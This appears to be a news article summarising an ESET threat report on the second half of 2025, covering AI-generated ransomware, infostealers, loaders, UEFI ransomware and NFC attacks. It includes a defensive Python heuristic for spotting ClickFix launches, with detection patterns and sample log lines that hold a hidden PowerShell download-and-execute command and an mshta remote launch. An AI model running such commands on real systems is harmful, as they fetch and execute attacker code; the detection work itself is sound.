
SAN FRANCISCO (WHN) – Attackers are changing tactics fast, according to a new report from ESET Research covering a volatile second half of 2025. AI-generated malware is no longer a theoretical threat: ESET has now analysed real samples, marking a significant escalation in the cyber arms race.
ESET’s telemetry and analysis show that AI is no longer used only to craft more convincing phishing emails. It is now generating malicious code. PromptLock, which ESET identified as the first known AI-powered ransomware and described as a proof of concept, uses a locally hosted large language model to generate its malicious Lua scripts at runtime instead of shipping them precompiled. For defenders the practical consequence is that the scripts can differ from run to run, so a signature on any one payload is unreliable. This is not an incremental update; it points to a new class of threat in which the malware adapts its own behaviour dynamically.
Lumma Stealer, the dominant infostealer of the first half of the year until its infrastructure was disrupted by a coordinated takedown in May, saw its footprint shrink dramatically: detections fell 86% in H2 2025 compared with the first half. A key distribution vector, the HTML/FakeCaptcha trojan used in ClickFix attacks, has all but disappeared from ESET’s data. The takedown appears to have worked, but the swift emergence of replacement threats shows that attackers simply move on to the next entry point.
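A practitioner reading that HTML/FakeCaptcha and ClickFix were a primary Lumma vector will want a way to spot the pattern on endpoints. The following is an added example written for this article, not ESET code: a ClickFix lure ends with the victim pasting a clipboard command into the Windows Run dialog, so the telltale on the host is explorer.exe directly spawning mshta.exe or powershell.exe with a remote URL or hidden-window flags. The JSON field names and the sample events are constructed for illustration and are not taken from ESET telemetry.

```python
"""ClickFix execution heuristic (added example; not ESET's code or data).

ClickFix lures such as the HTML/FakeCaptcha family end with the user pasting
a clipboard command into the Windows Run dialog, so the first stage runs as
explorer.exe -> mshta.exe / powershell.exe with a remote URL or stealth
flags. Field names and sample events here are constructed.
"""
import json
import re

# First-stage interpreters/downloaders typical of ClickFix chains.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
           "curl.exe", "bitsadmin.exe", "certutil.exe"}

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Flags/cmdlets that hide the window or pull-and-run remote content.
STEALTH_OR_EXEC = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-enc(?:odedcommand)?\b"
    r"|-ep\s+bypass|\biex\b|invoke-expression|invoke-webrequest|\biwr\b",
    re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def is_clickfix_like(event):
    """Return the reasons an event matches the ClickFix execution pattern.

    An empty list means no match. Two independent indicators are required so
    that an interactive shell opened from a desktop shortcut is not flagged.
    """
    image = _basename(event.get("image", ""))
    parent = _basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    if image not in LOLBINS or parent != "explorer.exe":
        return []
    reasons = ["interpreter spawned directly by explorer.exe (Run dialog)"]
    if REMOTE_URL.search(cmd):
        reasons.append("remote URL in command line")
    if STEALTH_OR_EXEC.search(cmd):
        reasons.append("hidden-window or download-and-execute flags")
    return reasons if len(reasons) >= 2 else []


def triage(log_lines):
    """Parse JSON process-creation events; return (pid, image, reasons) hits."""
    hits = []
    for line in log_lines:
        event = json.loads(line)
        reasons = is_clickfix_like(event)
        if reasons:
            hits.append((event["pid"], _basename(event["image"]), reasons))
    return hits


def flagged_pids(log_lines):
    """Convenience wrapper: just the PIDs that triage() flagged."""
    return [pid for pid, _, _ in triage(log_lines)]


# Constructed sample: two ClickFix-style launches, three benign/out-of-scope.
SAMPLE_LOG = [
    r'{"pid": 4120, "parent_image": "C:\\Windows\\explorer.exe", '
    r'"image": "C:\\Windows\\System32\\mshta.exe", '
    r'"command_line": "mshta.exe https://example.invalid/verify.hta"}',
    r'{"pid": 4121, "parent_image": "C:\\Windows\\explorer.exe", '
    r'"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '
    r'"command_line": "powershell.exe -w hidden -nop -c \"iwr https://example.invalid/x.ps1 | iex\""}',
    r'{"pid": 4122, "parent_image": "C:\\Windows\\System32\\cmd.exe", '
    r'"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '
    r'"command_line": "powershell.exe -ep bypass -File C:\\ops\\deploy.ps1"}',
    r'{"pid": 4123, "parent_image": "C:\\Windows\\explorer.exe", '
    r'"image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe"}',
    r'{"pid": 4124, "parent_image": "C:\\Windows\\explorer.exe", '
    r'"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '
    r'"command_line": "powershell.exe"}',
]

if __name__ == "__main__":
    for pid, image, reasons in triage(SAMPLE_LOG):
        print(pid, image, "; ".join(reasons))
```

The parent-process requirement is what keeps the rule quiet on administrative scripts launched from consoles or schedulers (event 4122), and the two-indicator rule keeps it quiet on a user who simply opens PowerShell from a shortcut (event 4124); a real deployment would feed it Sysmon Event ID 1 or Windows 4688 records and should also watch the RunMRU registry key, which records what was typed into the Run dialog.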
In its place, CloudEyE, also known as GuLoader, has surged, with its presence in ESET telemetry rising nearly thirtyfold. This malware-as-a-service downloader and crypter is a critical component in multi-stage attack chains: it arrives by email and then fetches and decrypts the final payload, which ESET has seen include ransomware, the Rescoms remote access trojan, and infostealers such as Formbook and Agent Tesla. Its rise highlights how modular and service-oriented today’s cybercrime operations have become, and why blocking the loader stage is worth more than chasing each payload individually.
The ransomware picture is equally concerning. Victim counts for 2025 had already surpassed the 2024 total before the year ended, and ESET Research projects a roughly 40% year-over-year increase. Akira and Qilin now lead the ransomware-as-a-service (RaaS) market. Warlock, a lower-profile newcomer, reportedly uses novel evasion techniques, underscoring the constant cat-and-mouse game between attackers and defenders. The continued proliferation of EDR killers, tools built to disable or blind endpoint detection and response agents before the encryptor runs, shows that EDR remains a real obstacle for ransomware operators; it also means defenders should treat any tampering with security tooling as a high-fidelity early warning in its own right.
In a callback to past devastation, ESET researchers uncovered HybridPetya, a new derivative of the infamous Petya/NotPetya ransomware that targets modern UEFI-based systems. It installs a malicious EFI application and encrypts the NTFS Master File Table, and one variant can bypass UEFI Secure Boot on firmware that has not received the relevant patch, so having boot-security features enabled is not by itself protection. ESET found the samples on VirusTotal and, at the time of publication, had no evidence of in-the-wild deployment, which makes HybridPetya a warning about capability rather than an active campaign.
On the mobile front, Android users face growing abuse of Near Field Communication (NFC): ESET telemetry shows an 87% increase in NFC-based attacks. NGate, first documented by ESET in 2024 for relaying victims’ payment-card NFC data to an attacker’s device, has gained contact-stealing capabilities, likely to build fuller victim profiles for follow-on fraud. RatOn, a new entrant, combines Remote Access Trojan (RAT) functionality with NFC relay attacks, a rare but potent pairing that shows how far criminals will go to open new attack avenues.
Investment scams such as the Nomani campaigns are also maturing. Attackers are deploying higher-quality deepfakes and AI-generated phishing sites, and their ad campaigns are becoming shorter-lived so they rotate out before they can be reported and removed. ESET observed a slight dip in Nomani detections in H2 2025, but year-over-year growth still stands at 62%, so the threat to unwary investors persists.
The core takeaway from ESET’s H2 2025 report is the sheer speed of adaptation. Attackers are not merely iterating; they are adopting AI and refining techniques that bypass established defences. HybridPetya’s Petya/NotPetya lineage and PromptLock’s AI-generated payloads show a willingness to revisit and enhance old methodologies, while the surge in CloudEyE and the advance of NFC threats mark a clear push into new territory.